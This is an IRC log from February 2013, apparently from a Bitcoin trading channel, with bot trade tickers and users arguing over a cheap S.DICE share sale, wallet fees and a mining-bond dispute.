jurov: hopefully they won't without also stopping the DDoS Feb 05 00:48:05 Luke-Jr: why 'D'DoS? Feb 05 00:48:10 i have no idea how their shit works, but anyway. was fun Feb 05 00:48:43 [MPEX] [S.MPOE] 4321 @ 0.00069821 = 3.017 BTC [-] Feb 05 00:48:44 [MPEX] [S.MPOE] 11319 @ 0.00069796 = 7.9002 BTC [-] Feb 05 00:48:45 [MPEX] [S.MPOE] 10000 @ 0.0006912 = 6.912 BTC [-] Feb 05 00:48:47 [MPEX] [S.MPOE] 6618 @ 0.00069002 = 4.5666 BTC [-] Feb 05 00:48:48 [MPEX] [S.MPOE] 9359 @ 0.00069002 = 6.4579 BTC [-] Feb 05 00:48:50 [MPEX] [S.MPOE] 18333 @ 0.00069001 = 12.65 BTC [-] Feb 05 00:48:51 seems fairly centralised in a bitcoin sense Feb 05 00:49:27 [MPEX] [S.MPOE] 4321 @ 0.00069967 = 3.0233 BTC [+] Feb 05 00:49:29 [MPEX] [S.MPOE] 4305 @ 0.00069998 = 3.0134 BTC [+] Feb 05 00:51:20 [MPEX] [S.MPOE] 1900 @ 0.00069998 = 1.33 BTC [+] Feb 05 00:53:38 https://bitcointalk.org/index.php?topic=141067.0 Feb 05 00:53:47 696 ASICMINER shares for sale Feb 05 00:54:40 you paid .1? Feb 05 00:55:09 [MPEX] [S.MPOE] 11984 @ 0.00069998 = 8.3886 BTC [+] Feb 05 00:55:11 [MPEX] [S.MPOE] 4898 @ 0.00069999 = 3.4286 BTC [+] Feb 05 00:55:14 [MPEX] [S.MPOE] 118 @ 0.00069999 = 0.0826 BTC [+] Feb 05 00:55:23 yeah Feb 05 00:56:08 and put them up for auction at that starting price Feb 05 01:00:53 [BTCTC] [COGNITIVE] 2 @ 0.3299 = 0.6598 BTC [+] Feb 05 01:04:51 jcpham so you were right, it lasted 10 minutes Feb 05 01:05:20 [MPEX] [S.MPOE] 14350 @ 0.00069998 = 10.0447 BTC [-] Feb 05 01:07:15 [MPEX] [S.MPOE] 4321 @ 0.00069011 = 2.982 BTC [-] Feb 05 01:07:16 [MPEX] [S.MPOE] 5523 @ 0.00069001 = 3.8109 BTC [-] Feb 05 01:10:09 [BTCTC] [COGNITIVE] 1 @ 0.33 BTC [+] Feb 05 01:11:39 [MPEX] [S.MPOE] 11200 @ 0.00069001 = 7.7281 BTC [-] Feb 05 01:15:25 [MPEX] [S.MPOE] 4321 @ 0.00069988 = 3.0242 BTC [+] Feb 05 01:15:30 [MPEX] [S.MPOE] 14849 @ 0.00069999 = 10.3942 BTC [+] Feb 05 01:15:33 [MPEX] [S.MPOE] 25650 @ 0.00069998 = 17.9545 BTC [-] Feb 05 01:16:29 [MPEX] [S.MPOE] 4321 @ 0.00069027 = 2.9827 BTC [-] Feb 05 01:16:31 [MPEX] [S.MPOE] 379 @ 0.00069001 = 0.2615 BTC [-] Feb 05 01:23:09 [MPEX] [S.MPOE] 10935 @ 0.00069001 = 7.5453 BTC [-] Feb 05 01:36:29 [MPEX] [S.MPOE] 3279 @ 0.00069999 = 2.2953 BTC [+] Feb 05 01:36:31 [MPEX] [S.MPOE] 4321 @ 0.00069974 = 3.0236 BTC [-] Feb 05 01:36:32 [MPEX] [S.MPOE] 4600 @ 0.00069471 = 3.1957 BTC [-] Feb 05 01:42:55 [MPEX] [S.MPOE] 3450 @ 0.00069018 = 2.3811 BTC [-] Feb 05 01:45:19 [HAVELOCK] [SDICE] 1 @ 0.7590101 BTC [+] Feb 05 01:45:39 ;;tslb Feb 05 01:45:41 Time since last block: 3 minutes and 8 seconds Feb 05 01:47:40 what wallet takes the smallest cut for afee? Feb 05 01:48:12 your own Feb 05 01:48:13 [04:34:22] Diablo-D3: there? Feb 05 01:48:14 yes? Feb 05 01:48:27 the default bitcoin wallet takes no cut for a fee Feb 05 01:48:41 wallets take cuts now ?! Feb 05 01:48:47 mtgox charges no tx fees, they say not to use the trading account as a wallet however Feb 05 01:48:58 I mean, its fast, and you get a much more stable chip Feb 05 01:49:12 and you can fab them at sizes you cant cheaply buy fpgas Feb 05 01:49:12 bitcoin qt just charged me .0045 fee Feb 05 01:49:21 mircea_popescu: that was originally gavin's company's whole business model, something like 1%-5% fees for strongcoin web wallet Feb 05 01:50:07 j1717: those are transaction fees, and happen whenver you do transactions anywhere with bitcoin Feb 05 01:50:12 j1717: well that fee was determined necessary to be accepted. perhaps you could manually create the tx and hope it still gets included with no fee, but comeone Feb 05 01:50:40 j1717: https://en.bitcoin.it/wiki/Transaction_fees Feb 05 01:50:50 (unless you use an old or hacked client to do 0 fee transactions, which will take forever to actually get accepted Feb 05 01:52:17 yeah 1% on strongcoin Feb 05 01:53:37 [MPEX] [S.MPOE] 871 @ 0.00069018 = 0.6011 BTC [-] Feb 05 01:53:39 [MPEX] [S.MPOE] 1329 @ 0.00069001 = 0.917 BTC [-] Feb 05 01:54:34 https://www.strongcoin.com/en/blog/frequently_asked_questions How secure are your servers ? StrongCoin is hosted on Heroku Feb 05 02:03:07 wait. what ?! Feb 05 02:03:13 gavin was involved with strongcoin ?! Feb 05 02:04:27 uh yeah Feb 05 02:04:42 Namworld: so what does btcbond's news mean for btcmining? Feb 05 02:05:49 ugh. i thought solidcoin was this ridiculous one man fork which had like, imaginary nodes with "unspendable" millions and other hacky 16 yo nonsense Feb 05 02:05:54 am i confusing it ?! Feb 05 02:06:42 i remember that, it may have been called that, but strongcoins.com is a web wallet. they used to employ gavin, i don't know currently Feb 05 02:06:48 *strongcoin.com Feb 05 02:07:51 Diablo-D3: Feb 05 02:07:51 pm Feb 05 02:11:26 hi all Feb 05 02:11:40 [BTCTC] [B.YABMC] 13 @ 0.0242 = 0.3146 BTC [-] Feb 05 02:11:41 [BTCTC] [B.YABMC] 12 @ 0.0242 = 0.2904 BTC [-] Feb 05 02:12:53 !help Feb 05 02:12:53 List of commands: Feb 05 02:12:55 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Feb 05 02:13:18 [HAVELOCK] [SDICE] 1 @ 0.745 BTC [-] Feb 05 02:13:24 means I'll probably have to sue amazingrando. I'm not sure our conversation records are sufficient at all for this. Feb 05 02:14:04 ;;ticker Feb 05 02:14:05 BTCUSD ticker | Best bid: 20.47411, Best ask: 20.65000, Bid-ask spread: 0.17589, Last trade: 20.47411, 24 hour volume: 52068.35970111, 24 hour low: 19.85502, 24 hour high: 21.05000, 24 hour vwap: 20.42514 Feb 05 02:14:20 sue over 250 btc ? Feb 05 02:14:29 Namworld: you could loan one of your avalon units to btc-mining Feb 05 02:14:37 mircea_popescu: its more than that Feb 05 02:14:44 a Feb 05 02:14:57 its in the thousands I think Feb 05 02:14:57 2369 BTC* Feb 05 02:15:03 o no way ?! Feb 05 02:15:08 and 106 of that btc is mine Feb 05 02:15:13 aye Feb 05 02:15:20 [HAVELOCK] [SDICE] 1 @ 0.7590101 BTC [+] Feb 05 02:15:23 so how come you're not one of the 85% Feb 05 02:15:36 he didn't get much more than 30k total, did he ? Feb 05 02:17:05 100000 bonds x .6 BTC = 60k BTC? Feb 05 02:17:18 Approximated Feb 05 02:18:17 I don't think he sold all his hashing at that price Feb 05 02:18:34 but there's like no margin kept for the operation's expense?!? Feb 05 02:18:45 He sold all the hashing it seems Feb 05 02:18:53 perpetual Feb 05 02:20:06 well the terms keep shifting around, but anyway. Feb 05 02:21:40 He should refit his rig for some other purpose. A 600 GPU cluster could propably fetch more by being rented as such than the 15k he makes mining per month. Feb 05 02:22:40 ;;everify freenode:#bitcoin-otc:09d6242f5fab39f5c63e486a8b81d9762d15ac12beddb4e569f7b24d Feb 05 02:22:40 Error: In order to authenticate, you must be present in one of the following channels: #bitcoin-otc;#bitcoin-otc-foyer;#bitcoin-otc-ru;#bitcoin-otc-eu;#bitcoin-otc-uk;#bitcoin-otc-bans Feb 05 02:22:55 ;;eauth DeadWeasel Feb 05 02:22:55 Request successful for user DeadWeasel, hostmask DeadWeasel!~DeadWease@108-61-55-67ch.openskytelcom.net. Get your encrypted OTP from http://bitcoin-otc.com/otps/6D206C24463BEC07 Feb 05 02:23:07 [MPEX] [S.DICE] 130 @ 0.00736659 = 0.9577 BTC [-] Feb 05 02:23:27 doing what ? Feb 05 02:23:53 ;;everify freenode:#bitcoin-otc:0759d0648d6f1f549ad334ff7accb25268c0bbb8c1642dda1b42e781 Feb 05 02:23:53 Error: In order to authenticate, you must be present in one of the following channels: #bitcoin-otc;#bitcoin-otc-foyer;#bitcoin-otc-ru;#bitcoin-otc-eu;#bitcoin-otc-uk;#bitcoin-otc-bans Feb 05 02:24:05 calculations. GPU clusters are good for various computational needs. Feb 05 02:24:12 Not just bitcoin hashing... Feb 05 02:24:27 sounds vague. Feb 05 02:24:51 aanyway, i'm impressed with the entire "rigs are worthless now that you've bought them for me" stuff Feb 05 02:25:04 literally not one single miner, large or small, has done anything else Feb 05 02:25:18 maybe just tag the lot of them and be done with it. persecution of miners. Feb 05 02:25:53 ;;rate mircea_popescu 1 Feb 05 02:25:54 Rating entry successful. Your rating of 1 for user mircea_popescu has been recorded. Feb 05 02:26:04 thx for the help mircea_popescu Feb 05 02:26:12 gotta start somewhere. Feb 05 02:26:19 sure Feb 05 02:26:21 o btw! Feb 05 02:26:29 ;;rate DeadWeasel -1 THAT CODE WAS DEFFECTIVE Feb 05 02:26:29 Error: For identification purposes, you must be identified via GPG to use the rating system. Feb 05 02:26:46 what? Feb 05 02:26:48 lol Feb 05 02:26:51 jus' messin with ya Feb 05 02:26:58 they DID ban me tho Feb 05 02:27:02 christ on crutches Feb 05 02:27:03 but i doubt you had anything to do with it. Feb 05 02:27:14 you can do that fine for yourself, clearly Feb 05 02:27:15 ;;rate DeadWeasel -2 trusts mircea_popescu Feb 05 02:27:16 already banned? Feb 05 02:27:17 Rating entry successful. Your rating of -2 for user DeadWeasel has been recorded. Feb 05 02:27:26 jessus christ Feb 05 02:27:26 kakobrekla literally 10 minutes. Feb 05 02:27:32 lol poor guy had a heart attack Feb 05 02:27:46 ;;unrate DeadWeasel Feb 05 02:27:47 um, seriously, could ya'll reverse that shit? Feb 05 02:27:47 Successfully removed your rating for DeadWeasel. Feb 05 02:27:50 thanks Feb 05 02:28:02 WoT has less meaning to it after this experience. Feb 05 02:28:04 and i was just bout ;;rate pigeons -3 rates cause of ratings! Feb 05 02:28:12 lmao RATEWAR! Feb 05 02:28:18 DeadWeasel wot is meaningless in itself. Feb 05 02:28:28 you gotta understand it to use it to any effect. Feb 05 02:28:29 I see that now.. learning is fun. Feb 05 02:28:55 experience is the best teacher. unless you've got guide?? Feb 05 02:29:18 how old are you if you don't mind my asking ? Feb 05 02:29:37 vague? I think GPU clusters can be used for graphical rendering... simulations... password cracking Feb 05 02:29:42 first lesson, believeing WoT is actually a safe haven for doing business is false. Feb 05 02:29:42 that sort of things Feb 05 02:29:58 second lesson, dont tell your age to MP. Feb 05 02:30:00 DeadWeasel it is. it's just not easy to game. Feb 05 02:30:37 I'm not sure how you can use them exactly. I just know many companies rent GPU clusters. And price is usually hefty Feb 05 02:30:46 yeah but who is paying for third party gpu work? Feb 05 02:30:58 Would probably involve a lot of work and expenses for amazingrando to refit tho Feb 05 02:31:03 i have seen some deals for password cracking, but they weren't steady jobs Feb 05 02:31:06 Namworld unless you know someione specifically paying 15001 right now Feb 05 02:31:08 it's vague Feb 05 02:31:15 aye Feb 05 02:31:24 [MPEX] [S.MPOE] 6023 @ 0.00069383 = 4.1789 BTC [+] Feb 05 02:31:26 [MPEX] [S.MPOE] 12077 @ 0.00069001 = 8.3333 BTC [-] Feb 05 02:31:56 http://forums.somethingawful.com/showthread.php?threadid=3532233 Feb 05 02:32:01 this really turned out well. Feb 05 02:32:28 there are more twats on SometingAweful than bitcointalk Feb 05 02:32:38 lol ya Feb 05 02:32:47 still. i had 10 bux worth of fun Feb 05 02:32:55 and i think i owned them worth half a buttcoin Feb 05 02:32:59 like... a cheekcoin Feb 05 02:33:00 's wort Feb 05 02:33:03 no doubt. Feb 05 02:35:55 i wonder what burned more, the "i can't distinguish you from reddit" part or the "paid for account with buttcoins" part. Feb 05 02:40:20 [HAVELOCK] [SDICE] 1 @ 0.76 BTC [+] Feb 05 02:44:20 well anyway. that's enough exciteement for one day. Feb 05 02:44:22 take it ezzy all Feb 05 02:44:42 ;;ticker Feb 05 02:44:43 BTCUSD ticker | Best bid: 20.49673, Best ask: 20.69999, Bid-ask spread: 0.20326, Last trade: 20.49671, 24 hour volume: 52397.98545826, 24 hour low: 19.85502, 24 hour high: 21.05000, 24 hour vwap: 20.42687 Feb 05 02:44:52 adios Feb 05 02:45:35 ;;calc 253 * 20.49 / 1500 Feb 05 02:45:36 3.45598 **** BEGIN LOGGING AT Tue Feb 5 10:19:04 2013 Feb 05 10:19:32 wb! Feb 05 10:19:45 heya Feb 05 10:19:48 ;;ticker Feb 05 10:19:49 BTCUSD ticker | Best bid: 20.41001, Best ask: 20.50879, Bid-ask spread: 0.09878, Last trade: 20.41000, 24 hour volume: 49661.44876349, 24 hour low: 19.85502, 24 hour high: 20.89000, 24 hour vwap: 20.33937 Feb 05 10:20:03 hello MP Feb 05 10:20:07 how goes ? Feb 05 10:20:11 big drame here :) Feb 05 10:20:13 well... heheh Feb 05 10:20:14 hey MP Feb 05 10:20:17 can you process mpex deposits Feb 05 10:20:18 ? Feb 05 10:20:43 yeah, one moment. Feb 05 10:20:49 error4733 o ? Feb 05 10:21:39 ohoho what happened to s.dice Feb 05 10:21:41 did luke kill it ? Feb 05 10:22:03 these "new" 5mil shares of sdice Feb 05 10:22:07 ppl are crying Feb 05 10:22:25 o o Feb 05 10:22:38 good time to buy i guess Feb 05 10:22:38 well Feb 05 10:22:38 a couple Feb 05 10:22:41 no, +5mil shares Feb 05 10:22:41 released Feb 05 10:22:46 @ .0044 Feb 05 10:22:59 lemme get you the thread Feb 05 10:22:59 https://bitcointalk.org/index.php?topic=101902.msg1504652#msg1504652 Feb 05 10:22:59 theres that Feb 05 10:22:59 heh Feb 05 10:22:59 the big question is did he violate the contract Feb 05 10:23:15 mod6 no ? Feb 05 10:23:15 mod6: who though. Feb 05 10:23:15 who? ev Feb 05 10:23:15 mircea_popescu: : thts why i asked you to do deposits Feb 05 10:23:15 real quick Feb 05 10:23:15 :P Feb 05 10:23:36 ipo ended jan 3rd, rest of shares were added feb 3rd Feb 05 10:30:21 b) at a price no less than the higher of the 1 day average price and the 30 day average price then current on MPEx ; Feb 05 10:30:21 Everyone is wondering if this statement is in play because he sold the tranche at .0044 Feb 05 10:30:22 !ticker m S.DiCE Feb 05 10:30:22 [MPEX:S.DICE] 1D: 0.0042 / 0.00544701 / 0.007395 (286728 shares, 1,561.81 BTC), 7D: 0.0042 / 0.00674716 / 0.007395 (953182 shares, 6,431.28 BTC), 30D: 0.00085848 / 0.00516138 / 0.0075 (6135135 shares, 31,665.79 BTC) Feb 05 10:30:22 mp can you detail the 2.2.a on IPO details ? Feb 05 10:30:22 I was under the impression that the share issuance mean releasing shares to public Feb 05 10:30:22 if anything I think the right thing to do is leave at 0.44, next block is at 0.70 onwards Feb 05 10:30:22 that way everyone is happy Feb 05 10:30:22 i am happy with more 0.0044 blocks >,> Feb 05 10:30:22 everyone else should be too Feb 05 10:30:22 we get our cheap shares new investors get cheap shares, value goes up Feb 05 10:30:22 im not Feb 05 10:30:22 until topace goes online so i can buy those too Feb 05 10:30:22 im still convinced that he did this wrong Feb 05 10:30:22 everyone gets cheap shares, then it goes up Feb 05 10:30:22 yeah. but wait till i get a private offering Feb 05 10:30:22 bow: lol get them elsewhere Feb 05 10:30:22 lol Feb 05 10:30:22 BF, coinbr, btct Feb 05 10:30:22 havelock tends to rise the highest. perfect for cashing out ^^ Feb 05 10:30:22 I'll crash the havelock price at 0.44 then ask for an offering Feb 05 10:30:22 go for it heh Feb 05 10:30:22 i need topace for that Feb 05 10:30:22 lol Feb 05 10:30:22 hes asleep Feb 05 10:30:23 sms him :P Feb 05 10:30:23 "WAKE UP AND GIVE ME OFFERING" :P Feb 05 10:30:23 its 3.30 am Feb 05 10:30:23 lol Feb 05 10:30:23 id rather not Feb 05 10:30:23 might be gone by the time he wakes up Feb 05 10:30:23 THIS SHIT DONT SLEE Feb 05 10:30:23 P Feb 05 10:30:23 then if yours 0.0070 goes into play, then you have to pay full Feb 05 10:30:23 800k shares left Feb 05 10:30:23 thats plenty of time Feb 05 10:30:23 36h Feb 05 10:30:23 5hrs Feb 05 10:30:23 or24 Feb 05 10:30:26 bet ? Feb 05 10:30:47 I'm too nice to take that bet Feb 05 10:30:50 lol Feb 05 10:31:06 seriously. Feb 05 10:31:06 agree Feb 05 10:31:18 okay, all deposits flushed Feb 05 10:31:19 get the rota back! Feb 05 10:31:19 Bowjob: : LOL Feb 05 10:31:20 have fun boys Feb 05 10:33:08 [MPEX] [S.DICE] 210000 @ 0.0044 = 924 BTC [+] Feb 05 10:33:08 so mp, was there a breach in contract? Feb 05 10:33:08 Wow Feb 05 10:33:08 >,> Feb 05 10:33:08 [MPEX] [S.DICE] 227272 @ 0.0044 = 999.9968 BTC [+] Feb 05 10:33:08 I didn do it Feb 05 10:33:08 btw Feb 05 10:33:08 Dude dont be greedy!! leave me some :( Feb 05 10:33:08 how much did you wanna bet? Feb 05 10:33:08 lol well there was 1/2 Feb 05 10:33:08 5min Feb 05 10:33:08 just curious Feb 05 10:33:08 LOL Feb 05 10:33:08 Fuck Feb 05 10:33:09 :( Feb 05 10:33:09 i am pretty sure Feb 05 10:33:09 the rest will be gone Feb 05 10:33:09 in 2`4 hours Feb 05 10:33:09 I know erik is gonna sell the next one at higher Feb 05 10:33:09 i know other ppl that willbe doing it Feb 05 10:33:09 I'll reiterate my offer to broker them for you Feb 05 10:33:09 yeah, Namworld's good :) Feb 05 10:33:13 or just pay a btc and signup on coinbr Feb 05 10:33:30 and get them straight from mpex Feb 05 10:33:34 and send them to havelock Feb 05 10:33:43 Bowjob nope ? Feb 05 10:33:43 then you are sure to get em Feb 05 10:33:43 Nam, do you issue shares? Feb 05 10:33:43 like dead terra? or just have it sent to james Feb 05 10:33:47 what would be the breach ? Feb 05 10:33:47 I have BTC-BOND on BTCT.co Feb 05 10:33:51 and there's BitVPS too Feb 05 10:34:03 !ticker m s.dice Feb 05 10:34:06 there was a confusion about the contract.. hold on Feb 05 10:34:06 [MPEX:S.DICE] 1D: 0.0042 / 0.00481465 / 0.007395 (724000 shares, 3,485.81 BTC), 7D: 0.0042 / 0.00600902 / 0.007395 (1390454 shares, 8,355.28 BTC), 30D: 0.00085848 / 0.00511072 / 0.0075 (6572407 shares, 33,589.79 BTC) Feb 05 10:34:12 I've just submitted S.MPOE, S.DICE & S.BBET passthrough on BTCT.co, pending approval Feb 05 10:34:14 Namworld: that buy was great use of btc-bond Feb 05 10:34:29 good thing you dont have to pay them out in large profits if you dont want to lol Feb 05 10:34:30 " All future share issuance will be made only a) subject to approval by MPEx and b) at a price no less than the higher of the 1 day average price and the 30 day average price then current on MPEx ; " Feb 05 10:35:44 Bowjob yes, but this wasn't a future share issuance. Feb 05 10:35:53 this was the original, guy got 100mn shares, of which 10mn were ipod Feb 05 10:36:05 and the remainder to be added to his acct 1 month after ipo closes. Feb 05 10:36:19 ipo started august, last share was sold jan 3rd (announced ehre) Feb 05 10:36:32 feb 3rd he got the rest of his 40mn shares and i guess he put some on sale. Feb 05 10:36:37 no breach. Feb 05 10:44:13 but you do anyways Feb 05 10:44:14 What does that mean exactly? Feb 05 10:44:16 nam: ah that reminds me Feb 05 10:44:30 never did turn on terras bbet pt :/ Feb 05 10:44:30 he picked up like 5k really cheap lol Feb 05 10:44:30 the big whale would do well if he downs the dice 11k btc Feb 05 10:44:30 and buys shares of dice with his winnings Feb 05 10:44:32 let hisother whale buddies play instead Feb 05 10:44:35 [MPEX] [S.DICE] 92512 @ 0.0044 = 407.0528 BTC [+] Feb 05 10:44:36 what Bowjob said Feb 05 10:44:36 [HAVELOCK] [SDICE] 12 @ 0.5321 = 6.3852 BTC [-] Feb 05 10:44:38 Nam, can you get me 80 BTC worth of shares? Feb 05 10:44:45 261k left Feb 05 10:44:46 If I can get a deposit done by mircea right away. Feb 05 10:44:46 If only he'd come around Feb 05 10:44:47 I already bought max for myself Feb 05 10:44:58 he already did deposits Feb 05 10:44:58 a few mini ago Feb 05 10:44:58 oh Feb 05 10:44:58 oh yeah, I see him posting 2 lines Feb 05 10:44:58 Hey mircea, can process a deposit right away? Feb 05 10:45:02 if Nam cant do it, seriously try coinbr. Feb 05 10:45:02 they _will_ be gone in a few hours Feb 05 10:45:02 if not sooner Feb 05 10:45:04 I highly doubt topace will be awake before they are gone Feb 05 10:45:16 mircea_popescu Feb 05 10:45:16 ^ important to use exact name for IRC client to annoy an user =P Feb 05 10:45:16 lol Feb 05 10:45:17 oh geez Feb 05 10:45:17 new massive-ruby-rails exploit https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/1h2DR63ViGo Feb 05 10:45:17 ah this is too stressful lol Feb 05 10:45:17 you mean AGAIN or you're late? Feb 05 10:45:17 [MPEX] [S.DICE] 92512 @ 0.0044 = 407.0528 BTC [+] Feb 05 10:45:17 @ukyo Feb 05 10:45:17 what about part b? Feb 05 10:45:17 again Feb 05 10:45:17 all right Feb 05 10:45:17 how does that apply or not apply Feb 05 10:45:17 thx for claryfiying Feb 05 10:45:17 arf Feb 05 10:45:17 versions 2.3.x and 3.0.x. Feb 05 10:45:17 effected Feb 05 10:45:17 [MPEX] [S.DICE] 20 @ 0.0044 = 0.088 BTC [+] Feb 05 10:45:35 hmmm ok well im off. Feb 05 10:45:38 c-ya Feb 05 10:46:41 [MPEX] [S.DICE] 227272 @ 0.0044 = 999.9968 BTC [+] Feb 05 10:46:50 [MPEX] [S.DICE] 3 @ 0.0044 = 0.0132 BTC [+] Feb 05 10:47:05 almost all gone… awesome! Feb 05 10:47:17 Wow Feb 05 10:47:19 I'm screwed Feb 05 10:47:22 Yold you Feb 05 10:47:25 dood Feb 05 10:47:26 I pmed you bowjob Feb 05 10:47:27 nam or coinbr Feb 05 10:47:27 Yes, Feb 05 10:47:28 if you want em Feb 05 10:47:48 [MPEX] [S.MPOE] 2721 @ 0.00069971 = 1.9039 BTC [+] Feb 05 10:47:50 [MPEX] [S.MPOE] 2180 @ 0.00069999 = 1.526 BTC [+] Feb 05 10:47:51 [MPEX] [S.MPOE] 5449 @ 0.0007 = 3.8143 BTC [+] Feb 05 10:48:50 [MPEX] [S.DICE] 16831 @ 0.0044 = 74.0564 BTC [+] Feb 05 10:48:53 Check PM Bowjob, or you want to forget about it? Feb 05 10:48:57 Ah nevermind Feb 05 10:49:02 I highly doubt topace will be awake before they are gone << BTC FINANCE NEVERSLEEPS! Feb 05 10:49:06 wait Feb 05 10:49:10 Looks like it's gone Feb 05 10:49:14 yeah Feb 05 10:49:23 like a bunch of starving hounds… lol Feb 05 10:49:24 17k left Feb 05 10:49:32 new massive-ruby-rails << exploit dude fuck me, ANOTHER ONE !? Feb 05 10:49:42 yeah... awesome isn't it. Feb 05 10:49:46 Well Feb 05 10:49:47 :( Feb 05 10:49:57 jessu god. Feb 05 10:49:57 This didn't happen. Voorhees never sold cheap dice Feb 05 10:50:01 lalalala i cant hear you Feb 05 10:50:05 and to think people STILL use ror for btc stuff Feb 05 10:50:06 insanity. Feb 05 10:50:12 [MPEX] [S.DICE] 200 @ 0.0044 = 0.88 BTC [+] Feb 05 10:50:20 Bowjob maybe he sells more who knows Feb 05 10:50:29 there are guys around who bought s.dice at 0.0008 so Feb 05 10:50:54 actually, i see 17k left at 44 ? Feb 05 10:51:44 Nam, thanks for the offer, my heart pounded for a bit tho >_> Feb 05 10:51:45 Bowjob: someone put for sale 500k S.DICE @ 0.0008 BTC each not long ago. Error sale. It was there for a few seconds before being canceled, free to be taken. Feb 05 10:51:51 and it was ipoed at 0.0032 Feb 05 10:51:51 I can still send it? Feb 05 10:51:51 Yes Feb 05 10:51:51 If I can't get them, I'll return the BTC Feb 05 10:51:54 ah nm then nam Feb 05 10:51:57 if hes taking all of them Feb 05 10:51:59 ignore my pm Feb 05 10:52:00 :P Feb 05 10:52:13 !ticker s.dice Feb 05 10:52:14 Um, shouldn't you be with your own tribe or somethin'? Feb 05 10:52:31 0,o Feb 05 10:52:37 [MPEX] [S.DICE] 17179 @ 0.0044 = 75.5876 BTC [+] Feb 05 10:52:40 [MPEX] [S.DICE] 500 @ 0.007 = 3.5 BTC [+] Feb 05 10:52:40 [MPEX] [S.DICE] 321 @ 0.00739497 = 2.3738 BTC [+] Feb 05 10:52:46 Nope, goner Feb 05 10:52:48 !ticker m s.dice Feb 05 10:52:50 [MPEX:S.DICE] 1D: 0.0042 / 0.00468036 / 0.007395 (1078838 shares, 5,049.36 BTC), 7D: 0.0042 / 0.00568318 / 0.007395 (1745292 shares, 9,918.82 BTC), 30D: 0.00085848 / 0.00507464 / 0.0075 (6927245 shares, 35,153.34 BTC) Feb 05 10:52:53 well that was quick Feb 05 10:52:54 Gratz Feb 05 10:53:00 bam Feb 05 10:53:05 I underestimated the power of mpex Feb 05 10:53:06 fuck Feb 05 10:53:08 lol so basically... they went 5 mins after i showed up and flushed deposits ? Feb 05 10:53:14 mp Feb 05 10:53:15 It's gone. It's all gone. Feb 05 10:53:16 error: how were you gonna bet errlier? LOL Feb 05 10:53:20 you are one powerful catalyst you know that? Feb 05 10:53:20 mircea: exactly Feb 05 10:53:31 dun dun dun Feb 05 10:53:33 had you not shown up, that dice would stay there Feb 05 10:53:35 5k volume in a day Feb 05 10:53:44 i know you have a big ego and all, but you deserve it this time Feb 05 10:53:45 ^ Feb 05 10:53:49 I think we made evoorhees fell bad enough that the next 1,000,000 will be at or above 0.007 Feb 05 10:53:58 lol i don't have a big ego, i just bruise op's egos Feb 05 10:53:59 yes, im okay with that Feb 05 10:54:03 lol Feb 05 10:54:12 Not always tho. I don't agree on most topics with Mircea I think. Feb 05 10:54:16 maximian well, if indeed it was him selling then ya, 44 was maybe a little low Feb 05 10:54:17 its a crazy undervalue by erik Feb 05 10:54:18 we really freaked out on him… heh heh Feb 05 10:54:21 he could have gotten moar Feb 05 10:54:32 yeah, we gave erik a good scolding Feb 05 10:54:32 lol Feb 05 10:54:33 :/ Feb 05 10:54:37 poor guy Feb 05 10:54:40 i think his investor Feb 05 10:54:42 and then you wonder why people don't want to list Feb 05 10:54:43 needed cash Feb 05 10:54:44 smoething happened Feb 05 10:54:46 HE IS GIVING YOU FREE MONEY Feb 05 10:54:46 or Feb 05 10:54:50 you are scolding him for it Feb 05 10:54:50 SOMETHING HAPPEEND Feb 05 10:54:53 i told him i trusted just judgement.. so its all good Feb 05 10:54:55 and we getting screwed Feb 05 10:54:55 lol Feb 05 10:54:56 in the end Feb 05 10:54:56 lol Feb 05 10:55:13 [02:55] HE IS GIVING YOU FREE MONEY Feb 05 10:55:16 I'm a greedy bastard! I want him to give me MOAR FREE MONEY Feb 05 10:55:20 Let the truth ring out Feb 05 10:55:23 ppl need to stop complaining Feb 05 10:55:29 Yes.. Mammon possessed me Feb 05 10:55:33 :) Feb 05 10:55:45 nam, thanks again for the pm Feb 05 10:55:53 so how big was the block, 500k ? 1mn ? Feb 05 10:55:57 1m Feb 05 10:56:11 out of 5M Feb 05 10:56:21 the next block will be a bit more exp Feb 05 10:56:38 20:55] just next block please dont undermine us too much >:/ Feb 05 10:56:46 [20:55] bowjob - I think that's fair Feb 05 10:56:54 there you go Feb 05 10:57:01 I tried to convince evoorhees to not do that again too... Feb 05 10:57:21 I want large walls at 0.75, 0.76, 0.77, 0.78 Feb 05 10:57:22 well everyones happy with this. we get cheap dice, new investors get cheap dice Feb 05 10:57:23 lol ok Feb 05 10:57:29 1 million each Feb 05 10:57:31 maybe that was his idea really Feb 05 10:57:34 now those poor fuckers who cashed out at havelock Feb 05 10:57:36 give people a chance you know ? Feb 05 10:57:42 are screwed Feb 05 10:57:43 lol Feb 05 10:57:49 Panic selling... Feb 05 10:57:54 last time I panick sold it did not end well Feb 05 10:57:57 !ticker h sdice Feb 05 10:57:57 I've earned good money on those Feb 05 10:57:59 [HAVELOCK:SDICE] 1D: 0.52100000 / 0.69673814 / 0.76500000 (683 shares, 475.87214730 BTC), 7D: 0.52100000 / 0.73408862 / 0.89000000 (2245 shares, 1648.02895898 BTC), 30D: 0.44000000 / 0.61127055 / 0.89000000 (6178 shares, 3776.42947722 BTC) Feb 05 10:57:59 so I learned from my mistakes Feb 05 10:58:08 69 not so horrid is it Feb 05 10:58:12 I usually try to sell when I have a profit Feb 05 10:58:24 sometimes I bit my fingers seeing it keeping going up and up Feb 05 10:58:32 nah Feb 05 10:58:37 im fine iwht 69 Feb 05 10:58:40 But most of the time, it gives me fund for the next panic sale. Feb 05 10:58:43 yo people, i just realised Feb 05 10:58:48 this sounds just like a real market and everything! Feb 05 10:58:56 -_- Feb 05 10:58:58 this is a real market Feb 05 10:59:00 >_> Feb 05 10:59:06 whodda thunk it. Feb 05 10:59:07 !ticker s s.dice Feb 05 10:59:08 You know, I've had it up to here with this Indian malarkey. Feb 05 10:59:08 im playing with real moneies here Feb 05 10:59:09 I don't think he had much idea Feb 05 10:59:10 yes, it is a real market. You just realized that? :P Feb 05 10:59:14 For a small bitcoin idea worth a few million USD Feb 05 10:59:20 lol Feb 05 10:59:23 it wasnt a small idea Feb 05 10:59:24 seemed shocked that people were'nt over the moon about it Feb 05 10:59:30 i wonder whrre satoshi is Feb 05 10:59:41 jaquzzie Feb 05 10:59:42 :P Feb 05 10:59:54 avalon fucks up 1st batc horders, right ? gets in 64 right ? Feb 05 10:59:54 yeah which jacuzzi Feb 05 10:59:59 ;;calc 64 * 80 Feb 05 10:59:59 5120 Feb 05 11:00:02 that is 5k too. Feb 05 11:00:05 